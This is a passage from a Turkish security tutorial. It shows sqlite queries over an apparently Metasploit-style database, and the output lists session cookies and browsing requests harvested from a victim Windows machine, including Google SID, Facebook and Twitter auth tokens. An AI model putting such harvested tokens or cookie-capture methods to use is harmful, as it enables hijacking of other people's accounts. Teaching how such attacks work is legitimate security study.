'ref_id' INTEGER,
'vuln_id' INTEGER
***)*** ;
Veri tabanı şemasından faydalanarak bilgileri kontrol edelim.
sqlite> ***select*** ******* from hosts;
1|2009-05-09 23:47:04|10.0.0.100|||alive||Windows|2000|||x86
sqlite> ***select*** ******* from notes where host_id ***=*** 1;
1|2009-05-09 23:47:04|1|http_cookies|en-us.start2.mozilla.com __utma***=*** 183859642.1221819733.1241334886.1241334886.1241334886.1; __utmz***=*** 183859642.1241334886.1.1.utmccn***=(*** organic***)*** |utmcsr***=*** google|utmctr***=*** firefox|utmcmd***=*** organic
2|2009-05-09 23:47:04|1|http_request|en-us.start2.mozilla.com:80 GET /firefox Windows FF 1.9.0.10
3|2009-05-09 23:47:05|1|http_cookies|adwords.google.com PREF***=*** ID***=*** ee60297d21c2a6e5:U***=*** ecaec12d78faa1ba:TM***=*** 1241913986:LM***=*** 1241926890:GM***=*** 1:S***=*** -p5nGxSz_oh1inss; NID***=*** 22***=*** Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID***=*** DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
4|2009-05-09 23:47:05|1|http_request|adwords.google.com:80 GET /forms.html Windows FF 1.9.0.10
5|2009-05-09 23:47:05|1|http_request|blogger.com:80 GET /forms.html Windows FF 1.9.0.10
6|2009-05-09 23:47:05|1|http_request|care.com:80 GET /forms.html Windows FF 1.9.0.10
7|2009-05-09 23:47:05|1|http_request|0.0.0.0:55550 GET /ads Windows Firefox 3.0.10
8|2009-05-09 23:47:06|1|http_request|careerbuilder.com:80 GET /forms.html Windows FF 1.9.0.10
9|2009-05-09 23:47:06|1|http_request|ecademy.com:80 GET /forms.html Windows FF 1.9.0.10
10|2009-05-09 23:47:06|1|http_cookies|facebook.com datr***=*** 1241925583-120e39e88339c0edfd73fab6428ed813209603d31bd9d1dccccf3; ABT***=*** ::#b0ad8a8df29cc7bafdf91e67c86d58561st0:1242530384:A#2dd086ca2a46e9e50fff44e0ec48cb811st0:1242530384:B; s_vsn_facebookpoc_1***=*** 7269814957402
11|2009-05-09 23:47:06|1|http_request|facebook.com:80 GET /forms.html Windows FF 1.9.0.10
12|2009-05-09 23:47:06|1|http_request|gather.com:80 GET /forms.html Windows FF 1.9.0.10
13|2009-05-09 23:47:06|1|http_request|gmail.com:80 GET /forms.html Windows FF 1.9.0.10
14|2009-05-09 23:47:06|1|http_cookies|gmail.google.com PREF***=*** ID***=*** ee60297d21c2a6e5:U***=*** ecaec12d78faa1ba:TM***=*** 1241913986:LM***=*** 1241926890:GM***=*** 1:S***=*** -p5nGxSz_oh1inss; NID***=*** 22***=*** Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID***=*** DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
15|2009-05-09 23:47:07|1|http_request|gmail.google.com:80 GET /forms.html Windows FF 1.9.0.10
16|2009-05-09 23:47:07|1|http_cookies|google.com PREF***=*** ID***=*** ee60297d21c2a6e5:U***=*** ecaec12d78faa1ba:TM***=*** 1241913986:LM***=*** 1241926890:GM***=*** 1:S***=*** -p5nGxSz_oh1inss; NID***=*** 22***=*** Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID***=*** DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
17|2009-05-09 23:47:07|1|http_request|google.com:80 GET /forms.html Windows FF 1.9.0.10
18|2009-05-09 23:47:07|1|http_request|linkedin.com:80 GET /forms.html Windows FF 1.9.0.10
101|2009-05-09 23:50:03|1|http_cookies|safebrowsing.clients.google.com PREF***=*** ID***=*** ee60297d21c2a6e5:U***=*** ecaec12d78faa1ba:TM***=*** 1241913986:LM***=*** 1241926890:GM***=*** 1:S***=*** -p5nGxSz_oh1inss; NID***=*** 22***=*** Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID***=*** DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
102|2009-05-09 23:50:03|1|http_request|safebrowsing.clients.google.com:80 POST /safebrowsing/downloads Windows FF 1.9.0.10
108|2009-05-10 00:43:29|1|http_cookies|twitter.com auth_token***=*** 1241930535--c2a31fa4627149c521b965e0d7bdc3617df6ae1f
109|2009-05-10 00:43:29|1|http_cookies|www.twitter.com auth_token***=*** 1241930535--c2a31fa4627149c521b965e0d7bdc3617df6ae1f
sqlite>
Buradan ötesi, sizin veri tabanı bilginize ve kayıt edilen bilgilerin raporlanmasına kalmış durumdadır.